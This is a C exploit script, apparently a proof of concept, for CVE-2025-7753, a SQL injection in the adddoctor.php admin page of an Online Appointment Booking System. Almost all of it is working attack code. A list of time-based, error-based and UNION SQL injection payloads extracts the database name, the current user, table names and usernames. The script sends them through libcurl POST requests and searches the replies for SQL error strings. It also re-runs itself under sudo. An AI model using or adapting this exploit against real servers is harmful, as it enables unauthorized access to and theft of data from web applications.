# gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
# ./CODE_PROJECT -u http://127.0.0.1
Verbose Mode :
# ./CODE_PROJECT -u http://127.0.0.1 -v
File: exploit.c — Size: 15,0 KB — Lines: 440
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include "argparse.h"
#include <curl/curl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#define FULL_URL 2500
#define POST_DATA 1024
int verbose = 0;
int success = 0;
void checkSystem()
{
#ifdef _WIN32
printf("\e[1;31m[-] Error Run Exploit !\e[0m\n");
printf("\e[1;31m[-] Your Os : Windows 32 bit / 64 bit !\e[0m\n");
printf("\e[1;31m[-] Please Change Your System on Linux !\e[0m\n");
exit(1);
#elif TARGET_OS_MAC
printf("\e[1;31m[-] Error Run Exploit !\n");
printf("\e[1;31m[-] Your Os : MacOS !\n");
printf("\e[1;31m[-] Please Change Your System on Linux !\e[0m\n");
exit(1);
#elif __linux__
printf("\e[1;36m[+] Exploit started successfully...\e[0m\n");
printf("\e[1;36m[+] Your Os : Linux !\e[0m\n");
#else
printf("\e[1;31m[-] Error Run Exploit !\e[0m\n");
printf("\e[1;31m[-] Your Os : Unknow Os !\e[0m\n");
printf("\e[1;31m[-] Please Change Your System on Linux !\e[0m\n");
exit(1);
#endif
}
void checkPer()
{
if (getuid() != 0)
{
printf("===================================================\e[0m\n");
printf("[-] Not running as root. Trying with sudo...\e[0m\n");
char *args[] = {"sudo", "./CODE_PROJECT", NULL};
execvp("sudo", args);
perror("[-] execvp failed !");
__asm__ volatile
(
"mov 0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rdi"
);
}
printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
printf("===================================================\e[0m\n");
}
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
const char *payload[] =
{
"11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz",
"11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm",
"11' AND (SELECT 5118 FROM (SELECT COUNT(*), CONCAT(0x717a627871,"
"' OR IF(1=1, SLEEP(5), 0)--+"
"(SELECT (ELT(5118=5118,1))),0x7176707171,FLOOR(RAND()*2))x "
"FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- puZg",
"11' UNION SELECT null, database(), null, null-- -",
"11' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT user()), FLOOR(RAND()*2))x "
"FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -",
"11' UNION SELECT null, table_name, null, null FROM information_schema.tables WHERE table_schema=database()-- -",
"11' AND 1=0 UNION SELECT null, username, null, null FROM users LIMIT 1-- -"
};
void sendPayload(const char *url)
{
CURL *c = curl_easy_init();
CURLcode r;
char full[FULL_URL];
struct Mem chunk = {NULL, 0};
if (c == NULL)
{
printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"1:\n\t"
"syscall\n\t"
:
:
: "rax", "rdi", "rbx"
);
}
size_t len = strlen(url);
printf("\e[1;36m[-] Check Slash on Input Url ...\n");
char cleanUrl[1024];
strncpy(cleanUrl, url, sizeof(cleanUrl) - 1);
cleanUrl[sizeof(cleanUrl) - 1] = '\0';
len = strlen(cleanUrl);
if (len > 0 && cleanUrl[len - 1] == '/')
{
cleanUrl[len - 1] = '\0';
}
snprintf(full, sizeof(full), "%s/Online-Appointment-Booking-System-master/admin/adddoctor.php", cleanUrl);
printf("[+] Not Slash in URL !\n");
if (verbose)
{
printf("\e[1;37m=========================================\e[0m\n");
printf("\e[1;35m[+] Cleaning Reply...\e[0m\n");
printf("\e[1;35m[+] BUFFER response -> NULL\e[0m\n");
printf("\e[1;35m[+] LEN response -> 0\e[0m\n");
printf("\e[1;37m=========================================\e[0m\n");
}
chunk.buffer = NULL;
chunk.len = 0;
int numberPayload = sizeof(payload) / sizeof(payload[0]);
char postData[POST_DATA];
const char *rq[] =
{
"syntax error",
"mysql_fetch",
"You have an error in your SQL syntax",
"Warning: mysql",
"Query failed",
"unknown column",
"Unclosed quotation mark",
"SQLSTATE",
"Duplicate entry",
"mysql_num_rows",
"MySQL server version",
"subquery returns more than 1 row",
"Invalid query",
"Warning: mysqli",
"supplied argument is not a valid MySQL result resource",
"server version for the right syntax",
"syntax error or access violation",
"Column count doesn't match",
"Unknown column in 'field list'",
"You have an error in your SQL syntax near"
};
int numberF = sizeof(rq) / sizeof(rq[0]);
struct curl_slist *h = NULL;
if (c)
{
curl_easy_setopt(c,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(c,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(c,
CURLOPT_POST,
1L);
curl_easy_setopt(c,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(c,
CURLOPT_WRITEDATA,
&chunk);
curl_easy_setopt(c,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(c,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(c,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(c,
CURLOPT_SSL_VERIFYHOST,
0L);
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
curl_easy_setopt(c,
CURLOPT_HTTPHEADER,
h);
if (verbose)
{
curl_easy_setopt(c,
CURLOPT_VERBOSE,
1L);
}
for (int p = 0; p < numberPayload; p++)
{
char *encode = curl_easy_escape(c,
payload[p],
0);
if (!encode)
{
printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
"nop\n\t"
:
:
:"rax", "rdi"
);
}
snprintf(postData,
sizeof(postData),
"did=1111"
"&name=1111"
"&gender=female"
"&dob=0111-11-01"
"&experience=11"
"&specialization=111"
"&contact=11"
"&address=11"
"&username=%s"
"&pwd=11"
"®ion=11"
"&Submit=",
encode);
curl_easy_setopt(c,
CURLOPT_URL,
full);
curl_easy_setopt(c,
CURLOPT_POSTFIELDS,
postData);
r = curl_easy_perform(c);
if (r == CURLE_OK)
{
static int send = 0;
if (verbose)
{
if (send)
{
printf("\e[1;37m=========================================\e[0m\n");
printf("\e[1;37m[+] Input Url : %s\e[0m\n",
cleanUrl);
printf("\e[1;37m[+] Encode Url : %s\e[0m\n",
encode);
printf("\e[1;37m[+] full format Url : %s\e[0m\n",
full);
printf("\e[1;37m=========================================\e[0m\n");
send = 1;
}
}
curl_free(encode);
long code = 0;
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
curl_easy_getinfo(c,
CURLINFO_RESPONSE_CODE,
&code);
printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n",
code);
printf("\e[1;33m[+] Next Payload : %s\e[0m\n", payload[p]);
if (code >= 200 &&
code < 300)
{
printf("\e[1;34m[+] The payload was successfully responded to by the server !\e[0m\n\n");
printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
printf("%s\n", chunk.buffer ? chunk.buffer : "");
printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
printf("\e[1;33m[+] check Response Server...\e[0m\n");
for (int a = 0; a < numberF; a++)
{
if (chunk.buffer && strstr(chunk.buffer, rq[a]) != NULL)
{
printf("\e[1;34m[+] A suspicious word was found: %s\e[0m\n",
rq[a]);
printf("\e[1;34m[+] The server is vulnerable to CVE-2025-7753 !\e[0m\n");
success = 1;
break;
}
}
if (!success)
{
printf("\e[1;31m[-] Not suspicious word was found on Response !\e[0m\n");
if (verbose)
{
printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
printf("%s\n", chunk.buffer ? chunk.buffer : "");
printf("\e[1;33m-----------------------------------------------------------------------------------\n");
}
printf("\e[0;36m[*] Trying next payload...\e[0m\n\n");
printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
}
}
else
{
printf("\e[1;31m[-] Unexpected HTTP code %ld for this payload, trying next...\e[0m\n\n",
code);
}
} else
{
printf("\e[1;33m[!] Please Check Your Connection on Server !\e[0m\n");
printf("\e[1;33m[!] Exemple Command Check Access Connection : 127.0.0.1\e[0m\n");
const char *command = "/bin/ping";
char *const argv[] = {"ping", "-c","5", "127.0.0.1", NULL};
const char *envp[] = {NULL};
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[command], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"xor %%rbx, %%rbx\n\t"
"syscall\n\t"
:
:[command] "r" (command),
[argv] "r" (argv),
[envp] "r" (envp)
:"rax", "rdi", "rsi", "rdx"
);
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
}
curl_slist_free_all(h);
}
free(chunk.buffer);
curl_easy_cleanup(c);
}
int main(int argc,
const char **argv)
{
printf(
"\e[1;31m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖\n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▖▄▌\n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌\n"
" \e[1;37mByte Reaper\e[0m\n"
);
printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");
const char *targetUrl = NULL;
checkPer();
checkSystem();
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&targetUrl,
"Enter Target URL)"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!targetUrl)
{
printf("\e[1;33m[-] Please Enter Target Url !\e[0m\n");
printf("\e[1;33m[!] Exemple : ./exploit -u http://127.0.0.1\e[0m\n");
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"1:\n\t"
"syscall\n\t"
"xor %%rax, %%rax\n\t"
:
:
: "rax", "rdi", "rsi"
);
}
sendPayload(targetUrl);
}